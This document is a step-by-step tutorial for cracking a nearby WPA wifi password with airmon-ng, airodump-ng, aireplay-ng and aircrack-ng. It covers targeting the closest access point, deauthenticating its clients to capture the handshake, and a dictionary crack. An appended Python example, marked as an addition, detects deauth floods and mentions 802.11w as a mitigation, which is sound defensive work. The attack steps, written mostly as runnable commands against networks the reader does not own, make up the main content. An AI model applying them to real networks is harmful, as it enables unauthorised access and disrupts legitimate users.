First disconnect from the connected wifi network.
Then type in a terminal:
airmon-ng start $your-wifi-interface
You should get a new interface named mon0 (from MONitor interface 0) or something like that.
Scan nearby networks with airodump-ng mon0 (the same command is used again further down).
Focus on the closest network with the strongest signal. Let it work and do not close the terminal. The lower the PWR value, the closer the AP is. We need the BSSID and channel for the next step. Open another terminal and type:
airodump-ng --bssid 10:FE:ED:0B:6A:A6 -c 1 --write WPAcrack mon0
--bssid is the AP's wifi MAC address.
-c is the channel.
--write WPAcrack creates the file with the critical data about the wifi network.
mon0 is our wifi interface for monitoring.
Let it collect data for about 2-3 hours, or until #DATA gets close to 25000. The more clients are connected, the easier it will be for us to get the password.
Now it is time to deauth some clients. They will automatically reconnect to their network, and we will be able to get some critical data about the password. Let's open another terminal and type:
aireplay-ng --deauth 100 -a 10:FE:ED:0B:6A:A6 mon0 (--ignore-negative-one)
--deauth 100 is how many times we want to deauth the clients.
-a is the BSSID of the AP.
We bounced the users off their own AP, and when they re-authenticate, airodump-ng will capture the new 4-way handshake, which is what we need to attempt the password crack.
In the terminal running airodump-ng mon0 we shall see WPA HANDSHAKE. This means the handshake is in our file. This process may take a long time. Take a nap.
Finally we have to crack the password from the data collected in our file:
aircrack-ng WPAcrack-01.cap -w /srv/data/darkc0de
Yes, it is a dictionary crack. And yes, this step may take a while.
I will use the darkc0de wordlist from BackTrack.
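From the defender's side, the loud part of the procedure above is the deauth flood: a single BSSID suddenly sourcing dozens of broadcast deauthentication frames per second. The following is an added example, not part of the original tutorial, that scores constructed monitor-mode frame records (timestamp, subtype, BSSID, destination) with a sliding-window counter and flags such bursts; the frame tuples, BSSIDs and thresholds are all assumptions chosen for the demo.

```python
from collections import defaultdict, deque

DEAUTH_SUBTYPES = {"deauth", "disassoc"}
BROADCAST = "ff:ff:ff:ff:ff:ff"


def detect_deauth_bursts(frames, window=1.0, threshold=10):
    """Return one alert per BSSID that sources >= `threshold`
    deauth/disassoc frames inside any `window` seconds.

    frames: iterable of (timestamp_s, subtype, bssid, dst), sorted by time.
    A lone deauth (idle timeout, roaming) is normal; a tight burst aimed at
    the broadcast address is the signature of a forged deauth flood.
    Mitigation, not detection: 802.11w (Protected Management Frames) makes
    forged deauth frames from a non-AP station get dropped by clients.
    """
    recent = defaultdict(deque)   # bssid -> deque of (ts, dst) in window
    alerted = set()
    alerts = []
    for ts, subtype, bssid, dst in frames:
        if subtype not in DEAUTH_SUBTYPES:
            continue
        q = recent[bssid]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:   # drop frames older than window
            q.popleft()
        if len(q) >= threshold and bssid not in alerted:
            alerted.add(bssid)   # one alert per BSSID, not one per frame
            broadcast = sum(1 for _, d in q if d == BROADCAST)
            alerts.append({"bssid": bssid, "start": q[0][0],
                           "count": len(q), "broadcast": broadcast})
    return alerts


# Constructed sample: two APs, one legitimate single deauth on AP A, then a
# burst of 12 broadcast deauths within 0.12 s carrying AP B's BSSID.
SAMPLE_FRAMES = sorted(
    [(0.0, "beacon", "00:11:22:33:44:55", BROADCAST),
     (0.5, "deauth", "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"),
     (1.0, "beacon", "66:77:88:99:aa:bb", BROADCAST)]
    + [(10.0 + i * 0.01, "deauth", "66:77:88:99:aa:bb", BROADCAST)
       for i in range(12)]
)

if __name__ == "__main__":
    for a in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth burst from {a['bssid']} at t={a['start']:.2f}s: "
              f"{a['count']} frames, {a['broadcast']} to broadcast")
```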